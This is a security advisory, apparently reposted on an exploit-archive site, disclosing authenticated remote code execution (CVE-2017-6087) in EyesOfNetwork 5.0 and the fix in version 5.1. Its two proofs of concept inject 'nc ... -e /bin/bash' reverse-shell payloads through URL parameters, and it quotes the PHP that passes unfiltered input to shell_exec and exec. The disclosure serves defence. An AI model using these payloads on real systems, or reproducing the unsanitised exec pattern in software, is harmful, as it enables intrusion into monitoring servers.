EON 5.0 Remote Code Execution

2017.03.24
Credit: SYSDREAM Labs
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# [CVE-2017-6087] EON 5.0 Remote Code Execution ## Description EyesOfNetwork ("EON") is an OpenSource network monitoring solution. ## Remote Code Execution (authenticated) The Eonweb code does not correctly filter arguments, allowing authenticated users to execute arbitrary code. **CVE ID**: CVE-2017-6087 **Access Vector**: remote **Security Risk**: high **Vulnerability**: CWE-78 **CVSS Base Score**: 7.6 **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L ### Proof of Concept 1 On the attacker's host, we start a handler: ``` nc -lvp 1337 ``` The `selected_events` parameter is not correctly filtered before it is used by the `shell_exec()` function. There, it is possible to inject a payload like in the request below, where we connect back to our handler: ``` https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash; ``` #### Vulnerable code The payload gets injected into the `$event[$key]` and `$ged_command` variables of the `module/monitoring_ged/ged_functions.php` file, line 373: ``` $ged_command = "-update -type $ged_type_nbr "; foreach ($array_ged_packets as $key => $value) { if($value["type"] == true){ if($key == "owner"){ $event[$key] = $owner; } $ged_command .= "\"".$event[$key]."\" "; } } $ged_command = trim($ged_command, " "); shell_exec($path_ged_bin." ".$ged_command); ``` Two other functions in this file are also affected by this problem: * `delete($selected_events, $queue);` * `ownDisown($selected_events, $queue, $global_action);` ### Proof of Concept 2 On the attacker's host, we start a handler: ``` nc -lvp 1337 ``` The `module` parameter is not correctly filtered before it is used by the `shell_exec()` function. Again, we inject our connecting back payload: ``` https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding ``` #### Vulnerable code In the `module/index.php` file, line 24, we can see that our payload is injected into the `exec()` function without any sanitization: ``` # Check optionnal module to load if(isset($_GET["module"]) && isset($_GET["link"])) { $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l"); # Redirect to module page if rpm installed if($module!=0) { header('Location: '.$_GET["link"].''); } } ``` ## Timeline (dd/mm/yyyy) * 01/10/2016 : Initial discovery. * 09/10/2016 : Fisrt contact with vendor. * 23/10/2016 : Technical details sent to the security contact. * 27/10/2016 : Vendor akwnoledgement and first patching attempt. * 11/10/2016 : Testing the patch revealed that it needed more work. * 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed. * 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our repsonsible disclosure agreement. * 14/03/2017 : Public disclosure. Thank you to EON for the fast response. ## Solution Update to version 5.1 ## Affected versions * Version <= 5.0 ## Credits * Nicolas SERRA <n.serra@sysdream.com> -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top